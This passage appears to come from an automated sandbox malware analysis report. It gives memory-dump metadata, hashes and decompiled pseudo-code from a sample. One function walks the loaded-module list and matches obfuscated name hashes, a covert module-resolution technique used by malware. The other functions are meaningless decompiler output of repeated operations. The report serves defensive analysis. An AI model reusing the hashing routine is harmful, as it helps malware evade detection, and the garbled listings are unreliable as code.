                                                                                0x007a1dff
                                                                                0x007a1e01
                                                                                0x007a1e03
                                                                                0x007a1e03
                                                                                0x007a1e06
                                                                                0x007a1e10
                                                                                0x007a1e1a
                                                                                0x007a1e24

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: vAlW
                                                                                • API String ID: 0-571418455
                                                                                • Opcode ID: c044508676290591b7417447e2d91d774fc2577621b388adc985f9d3875846e0
                                                                                • Instruction ID: ed1ffc021d77fbbb51c0b0acabc08e30cb45470234ee8adfe817249e2c0e10ad
                                                                                • Opcode Fuzzy Hash: c044508676290591b7417447e2d91d774fc2577621b388adc985f9d3875846e0
                                                                                • Instruction Fuzzy Hash: 18417B716083429BD718EF79D84546FB7E6FBD1314F408E2DE4E287260E7B89A05CB86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A3F00, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E007A3F00(intOrPtr __ecx) {
				signed int _t92;
				intOrPtr* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t108;
				signed short* _t109;
				intOrPtr* _t110;
				void* _t111;

				_t94 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				 *((intOrPtr*)(_t111 + 0x18)) = __ecx;
				 *((intOrPtr*)(_t111 + 0x18)) = _t94;
				_t110 =  *_t94;
				if(_t110 == _t94) {
					L9:
					return 0;
				} else {
					do {
						_t109 =  *(_t110 + 0x30);
						 *(_t111 + 0x10) = 0x4090;
						 *(_t111 + 0x10) =  *(_t111 + 0x10) | 0x31656b5b;
						_t8 = _t111 + 0x10; // 0x31656b5b
						 *(_t111 + 0x10) =  *_t8 * 0x51;
						_t10 = _t111 + 0x10; // 0x31656b5b
						 *(_t111 + 0x10) = 0xb02c0b03 *  *_t10 >> 0x20 >> 6;
						 *(_t111 + 0x10) =  *(_t111 + 0x10) << 0x10;
						 *(_t111 + 0x10) =  *(_t111 + 0x10) | 0xecb0ddf8;
						 *(_t111 + 0x10) =  *(_t111 + 0x10) + 0x637e;
						 *(_t111 + 0x10) =  *(_t111 + 0x10) ^ 0xeef54176;
						 *(_t111 + 0x14) = 0x5ef;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0x6fab;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) | 0x1ac9183b;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) << 8;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) >> 2;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) ^ 0x325f6ec6;
						 *(_t111 + 0x14) = 0xc1f4;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0x1c7b;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) | 0x28c630b6;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0xffff17a2;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) << 0xb;
						 *(_t111 + 0x14) =  *(_t111 + 0x14) ^ 0x30b50810;
						if( *_t109 != 0) {
							do {
								_t95 =  *(_t111 + 0x10);
								 *(_t111 + 0x14) = 0x5ef;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0x6fab;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) | 0x1ac9183b;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) << 8;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) >> 2;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) ^ 0x325f6ec6;
								 *(_t111 + 0x14) = 0xc1f4;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0x1c7b;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) | 0x28c630b6;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0xffff17a2;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) << 0xb;
								 *(_t111 + 0x14) =  *(_t111 + 0x14) ^ 0x30b50810;
								_t103 =  *(_t111 + 0x10) << ( *(_t111 + 0x14) & 0x000000ff);
								_t92 =  *_t109 & 0x0000ffff;
								_t108 =  *(_t111 + 0x10) << ( *(_t111 + 0x14) & 0x000000ff);
								if(_t92 >= 0x41 && _t92 <= 0x5a) {
									_t92 = _t92 + 0x20;
								}
								 *(_t111 + 0x10) = _t92;
								_t109 =  &(_t109[1]);
								 *(_t111 + 0x10) =  *(_t111 + 0x10) + _t103;
								 *(_t111 + 0x10) =  *(_t111 + 0x10) + _t108;
								 *(_t111 + 0x10) =  *(_t111 + 0x10) - _t95;
							} while ( *_t109 != 0);
							_t94 =  *((intOrPtr*)(_t111 + 0x18));
						}
						if(( *(_t111 + 0x10) ^ 0x14d5ed60) ==  *((intOrPtr*)(_t111 + 0x1c))) {
							return  *((intOrPtr*)(_t110 + 0x18));
						} else {
							goto L8;
						}
						goto L11;
						L8:
						_t110 =  *_t110;
					} while (_t110 != _t94);
					goto L9;
				}
				L11:
			}











                                                                                0x007a3f0f
                                                                                0x007a3f12
                                                                                0x007a3f17
                                                                                0x007a3f1b
                                                                                0x007a3f1f
                                                                                0x007a408d
                                                                                0x007a4096
                                                                                0x007a3f25
                                                                                0x007a3f25
                                                                                0x007a3f25
                                                                                0x007a3f28
                                                                                0x007a3f30
                                                                                0x007a3f38
                                                                                0x007a3f3d
                                                                                0x007a3f46
                                                                                0x007a3f4f
                                                                                0x007a3f53
                                                                                0x007a3f58
                                                                                0x007a3f60
                                                                                0x007a3f68
                                                                                0x007a3f70
                                                                                0x007a3f78
                                                                                0x007a3f80
                                                                                0x007a3f88
                                                                                0x007a3f8d
                                                                                0x007a3f92
                                                                                0x007a3f9a
                                                                                0x007a3fa2
                                                                                0x007a3faa
                                                                                0x007a3fb2
                                                                                0x007a3fba
                                                                                0x007a3fbf
                                                                                0x007a3fcb
                                                                                0x007a3fd1
                                                                                0x007a3fd1
                                                                                0x007a3fd5
                                                                                0x007a3fdd
                                                                                0x007a3fe5
                                                                                0x007a3fed
                                                                                0x007a3ff2
                                                                                0x007a3ff7
                                                                                0x007a4008
                                                                                0x007a4010
                                                                                0x007a4018
                                                                                0x007a4020
                                                                                0x007a4028
                                                                                0x007a402d
                                                                                0x007a4035
                                                                                0x007a4040
                                                                                0x007a4043
                                                                                0x007a4048
                                                                                0x007a404f
                                                                                0x007a404f
                                                                                0x007a4052
                                                                                0x007a4056
                                                                                0x007a4059
                                                                                0x007a405d
                                                                                0x007a4061
                                                                                0x007a4065
                                                                                0x007a406f
                                                                                0x007a406f
                                                                                0x007a4080
                                                                                0x007a40a1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a4082
                                                                                0x007a4082
                                                                                0x007a4085
                                                                                0x00000000
                                                                                0x007a3f25
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: [ke1
                                                                                • API String ID: 0-815721638
                                                                                • Opcode ID: 8272599f0f0b03f4253f631f8b357c0dbf329d74f1d4cc76f89a9bf9e32a1888
                                                                                • Instruction ID: 4c7b2e2afa775534f31caa3b1a1e21041067b13789406f28be47d3ca876e663d
                                                                                • Opcode Fuzzy Hash: 8272599f0f0b03f4253f631f8b357c0dbf329d74f1d4cc76f89a9bf9e32a1888
                                                                                • Instruction Fuzzy Hash: 7D4113B28093468BD754CF14E68945BBBF0FBD0B54F004E5DE5A1A6251D3B9CA4CCBA3
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406DA8, Relevance: .2, Instructions: 240COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 81%
                                                                                			E00406DA8(intOrPtr* __eax, signed int __ecx, signed int* __edi, void* __esi) {
				intOrPtr* _t67;
				intOrPtr* _t68;
				signed char _t70;
				void* _t85;
				void* _t92;
				signed int _t94;
				intOrPtr* _t96;

				_t92 = __esi;
				_t69 = __ecx;
				asm("pushad");
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + 0x25)) =  *((intOrPtr*)(__eax + 0x25)) + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__edi =  *__edi + __ecx;
				asm("das");
				 *(__esi - 0x72d0faaf) =  *(__esi - 0x72d0faaf) ^ __ecx;
				_push(__eax);
				_push(es);
				asm("das");
				 *(__esi - 0x72d0f5af) =  *(__esi - 0x72d0f5af) ^ __ecx;
				_push(__eax);
				 *__edi =  *__edi | _t94;
				 *(__esi - 0x72d0f3af) =  *(__esi - 0x72d0f3af) ^ __ecx;
				_push(__eax);
				 *(__esi - 0x72d0faaf) =  *(__esi - 0x72d0faaf) ^ __ecx;
				_push(__eax);
				_pop(es);
				 *(__esi - 0x72d0fbaf) =  *(__esi - 0x72d0fbaf) ^ __ecx;
				_push(__eax);
				_t67 = __eax +  *__eax;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + __eax + 0xa;
				ss =  *((intOrPtr*)(__ecx + 0x1b));
				asm("das");
				asm("das");
				 *(__esi - 0x72d09daf) =  *(__esi - 0x72d09daf) ^ __ecx;
				_push(_t67);
				asm("a16 das");
				_t24 = __esi - 0x72d07aaf;
				 *_t24 =  *(__esi - 0x72d07aaf) ^ __ecx;
				_push(_t67);
				if( *_t24 >= 0) {
					ss =  *((intOrPtr*)(__ecx + 0x7d));
					asm("das");
					asm("das");
					asm("das");
					 *(__esi - 0x72d04baf) =  *(__esi - 0x72d04baf) ^ __ecx;
					_push(_t67);
					asm("scasb");
					asm("das");
					 *(__esi - 0x72d056af) =  *(__esi - 0x72d056af) ^ __ecx;
					_push(_t67);
					_t67 = 0x2f;
					 *(__esi - 0x72d02caf) =  *(__esi - 0x72d02caf) ^ __ecx;
					_push(0x2f);
					_t69 = 0xaf508d2f;
				}
				 *(_t92 - 0x72d035af) =  *(_t92 - 0x72d035af) ^ _t69;
				_push(_t67);
				asm("retf");
				asm("das");
				 *(_t92 - 0x72d01caf) =  *(_t92 - 0x72d01caf) ^ _t69;
				ss =  *((intOrPtr*)(_t69 - 0x1d));
				asm("das");
				asm("das");
				 *(_t92 - 0x72d036af) =  *(_t92 - 0x72d036af) ^ _t69;
				_push(_t67);
				asm("retf");
				 *(_t92 - 0x72d02aaf) =  *(_t92 - 0x72d02aaf) ^ _t69;
				_push(_t67);
				 *0xFFFFFFFF46803480 =  *0xFFFFFFFF46803480 ^ _t69;
				_push(_t67);
				_t68 = _t96;
				asm("das");
				 *0xFFFFFFFF46800980 =  *0xFFFFFFFF46800980 ^ _t69;
				_push(_t68);
				asm("invalid");
				 *0xFFFFFFFF467FE780 =  *0xFFFFFFFF467FE780 ^ _t69;
				_t70 = _t68;
				asm("das");
				_t85 = _t68 + 0x41;
				 *0xFFFFFFFFB9509E80 =  *0xFFFFFFFFB9509E80 ^ _t70;
				_push(_t70);
				asm("adc [eax], eax");
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t85;
				ss =  *((intOrPtr*)(_t70 + 0x11));
				 *0xFFFFFFFF47811180 =  *0xFFFFFFFF47811180 ^ _t70;
				_push(_t70);
				return _t68;
			}










                                                                                0x00406da8
                                                                                0x00406da8
                                                                                0x00406da8
                                                                                0x00406da9
                                                                                0x00406dab
                                                                                0x00406dad
                                                                                0x00406daf
                                                                                0x00406db1
                                                                                0x00406db3
                                                                                0x00406db9
                                                                                0x00406dbb
                                                                                0x00406dbd
                                                                                0x00406dbf
                                                                                0x00406dc1
                                                                                0x00406dc3
                                                                                0x00406dc5
                                                                                0x00406dc7
                                                                                0x00406dc9
                                                                                0x00406dcb
                                                                                0x00406dcd
                                                                                0x00406dcf
                                                                                0x00406dd1
                                                                                0x00406dd3
                                                                                0x00406dd5
                                                                                0x00406dd7
                                                                                0x00406dd9
                                                                                0x00406ddb
                                                                                0x00406ddd
                                                                                0x00406ddf
                                                                                0x00406de1
                                                                                0x00406de3
                                                                                0x00406de5
                                                                                0x00406de7
                                                                                0x00406de9
                                                                                0x00406deb
                                                                                0x00406ded
                                                                                0x00406def
                                                                                0x00406df1
                                                                                0x00406df3
                                                                                0x00406df5
                                                                                0x00406df7
                                                                                0x00406df9
                                                                                0x00406dfb
                                                                                0x00406dfd
                                                                                0x00406dff
                                                                                0x00406e01
                                                                                0x00406e03
                                                                                0x00406e05
                                                                                0x00406e07
                                                                                0x00406e09
                                                                                0x00406e0b
                                                                                0x00406e0d
                                                                                0x00406e0f
                                                                                0x00406e11
                                                                                0x00406e13
                                                                                0x00406e15
                                                                                0x00406e17
                                                                                0x00406e19
                                                                                0x00406e1b
                                                                                0x00406e1d
                                                                                0x00406e1f
                                                                                0x00406e21
                                                                                0x00406e23
                                                                                0x00406e25
                                                                                0x00406e27
                                                                                0x00406e29
                                                                                0x00406e2b
                                                                                0x00406e2d
                                                                                0x00406e2f
                                                                                0x00406e31
                                                                                0x00406e33
                                                                                0x00406e35
                                                                                0x00406e37
                                                                                0x00406e39
                                                                                0x00406e3b
                                                                                0x00406e3d
                                                                                0x00406e3f
                                                                                0x00406e41
                                                                                0x00406e43
                                                                                0x00406e45
                                                                                0x00406e47
                                                                                0x00406e49
                                                                                0x00406e4b
                                                                                0x00406e4d
                                                                                0x00406e4f
                                                                                0x00406e51
                                                                                0x00406e53
                                                                                0x00406e55
                                                                                0x00406e57
                                                                                0x00406e59
                                                                                0x00406e5b
                                                                                0x00406e5d
                                                                                0x00406e5f
                                                                                0x00406e61
                                                                                0x00406e63
                                                                                0x00406e65
                                                                                0x00406e67
                                                                                0x00406e69
                                                                                0x00406e6b
                                                                                0x00406e6d
                                                                                0x00406e6f
                                                                                0x00406e71
                                                                                0x00406e73
                                                                                0x00406e75
                                                                                0x00406e77
                                                                                0x00406e79
                                                                                0x00406e7b
                                                                                0x00406e7d
                                                                                0x00406e7f
                                                                                0x00406e81
                                                                                0x00406e83
                                                                                0x00406e85
                                                                                0x00406e87
                                                                                0x00406e89
                                                                                0x00406e8b
                                                                                0x00406e8d
                                                                                0x00406e8f
                                                                                0x00406e91
                                                                                0x00406e93
                                                                                0x00406e95
                                                                                0x00406e97
                                                                                0x00406e99
                                                                                0x00406e9b
                                                                                0x00406e9d
                                                                                0x00406e9f
                                                                                0x00406ea1
                                                                                0x00406ea3
                                                                                0x00406ea5
                                                                                0x00406ea7
                                                                                0x00406ea9
                                                                                0x00406eab
                                                                                0x00406ead
                                                                                0x00406eaf
                                                                                0x00406eb1
                                                                                0x00406eb3
                                                                                0x00406eb5
                                                                                0x00406eb7
                                                                                0x00406eb9
                                                                                0x00406ebb
                                                                                0x00406ebd
                                                                                0x00406ebf
                                                                                0x00406ec1
                                                                                0x00406ec3
                                                                                0x00406ec5
                                                                                0x00406ec7
                                                                                0x00406ec9
                                                                                0x00406ecb
                                                                                0x00406ecd
                                                                                0x00406ecf
                                                                                0x00406ed1
                                                                                0x00406ed3
                                                                                0x00406ed8
                                                                                0x00406edc
                                                                                0x00406ee2
                                                                                0x00406ee3
                                                                                0x00406ee4
                                                                                0x00406ee8
                                                                                0x00406eee
                                                                                0x00406eef
                                                                                0x00406ef4
                                                                                0x00406efa
                                                                                0x00406f00
                                                                                0x00406f06
                                                                                0x00406f07
                                                                                0x00406f08
                                                                                0x00406f0e
                                                                                0x00406f0f
                                                                                0x00406f11
                                                                                0x00406f13
                                                                                0x00406f15
                                                                                0x00406f17
                                                                                0x00406f19
                                                                                0x00406f1b
                                                                                0x00406f1d
                                                                                0x00406f1f
                                                                                0x00406f21
                                                                                0x00406f23
                                                                                0x00406f25
                                                                                0x00406f27
                                                                                0x00406f29
                                                                                0x00406f2b
                                                                                0x00406f2d
                                                                                0x00406f2f
                                                                                0x00406f31
                                                                                0x00406f33
                                                                                0x00406f35
                                                                                0x00406f37
                                                                                0x00406f39
                                                                                0x00406f3b
                                                                                0x00406f3d
                                                                                0x00406f3f
                                                                                0x00406f41
                                                                                0x00406f43
                                                                                0x00406f45
                                                                                0x00406f47
                                                                                0x00406f49
                                                                                0x00406f4b
                                                                                0x00406f4d
                                                                                0x00406f4f
                                                                                0x00406f51
                                                                                0x00406f53
                                                                                0x00406f55
                                                                                0x00406f58
                                                                                0x00406f5c
                                                                                0x00406f60
                                                                                0x00406f66
                                                                                0x00406f67
                                                                                0x00406f6c
                                                                                0x00406f6c
                                                                                0x00406f72
                                                                                0x00406f73
                                                                                0x00406f75
                                                                                0x00406f78
                                                                                0x00406f7c
                                                                                0x00406f80
                                                                                0x00406f84
                                                                                0x00406f8a
                                                                                0x00406f8b
                                                                                0x00406f8c
                                                                                0x00406f90
                                                                                0x00406f96
                                                                                0x00406f97
                                                                                0x00406f9c
                                                                                0x00406fa2
                                                                                0x00406fa3
                                                                                0x00406fa3
                                                                                0x00406fa8
                                                                                0x00406fae
                                                                                0x00406faf
                                                                                0x00406fb0
                                                                                0x00406fb4
                                                                                0x00406fb5
                                                                                0x00406fb8
                                                                                0x00406fbc
                                                                                0x00406fc0
                                                                                0x00406fc6
                                                                                0x00406fc7
                                                                                0x00406fc8
                                                                                0x00406fce
                                                                                0x00406fd4
                                                                                0x00406fda
                                                                                0x00406fdb
                                                                                0x00406fdc
                                                                                0x00406fe0
                                                                                0x00406fe6
                                                                                0x00406fe7
                                                                                0x00406fec
                                                                                0x00406ff3
                                                                                0x00406ff4
                                                                                0x00406ff5
                                                                                0x00406ff8
                                                                                0x00406ffa
                                                                                0x00406ffb
                                                                                0x00406ffd
                                                                                0x00406fff
                                                                                0x00407001
                                                                                0x00407003
                                                                                0x00407005
                                                                                0x00407007
                                                                                0x00407009
                                                                                0x0040700b
                                                                                0x0040700d
                                                                                0x00407010
                                                                                0x00407016
                                                                                0x00407017

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6cecdb589f966b03f6293758286911b4dc19da2011bc1522f246e62575e8c940
                                                                                • Instruction ID: 20bf51403c2509b144f3f333c661749d8aa9e89f02b69ed33ed482313f7fde02
                                                                                • Opcode Fuzzy Hash: 6cecdb589f966b03f6293758286911b4dc19da2011bc1522f246e62575e8c940
                                                                                • Instruction Fuzzy Hash: 4221FC7108A7C2DFD312D734D8989C2BFE99ECA21039A4DCDD0D49F077E2A45268C766
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409350, Relevance: .2, Instructions: 205COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E00409350() {
				void* _t82;
				intOrPtr* _t83;
				intOrPtr* _t84;
				signed int* _t88;
				signed int _t101;
				signed int _t102;
				signed char _t106;
				signed int _t107;
				intOrPtr _t108;
				void* _t111;
				void* _t112;
				signed char* _t113;
				intOrPtr* _t120;
				signed int* _t122;
				void* _t127;
				void* _t133;
				signed int _t136;
				signed int _t138;

				_t83 = _t82 + 1;
				 *_t83 =  *_t83 + _t83;
				 *_t106 =  *_t106 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *((intOrPtr*)(_t83 + 0x10)) =  *((intOrPtr*)(_t83 + 0x10)) + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
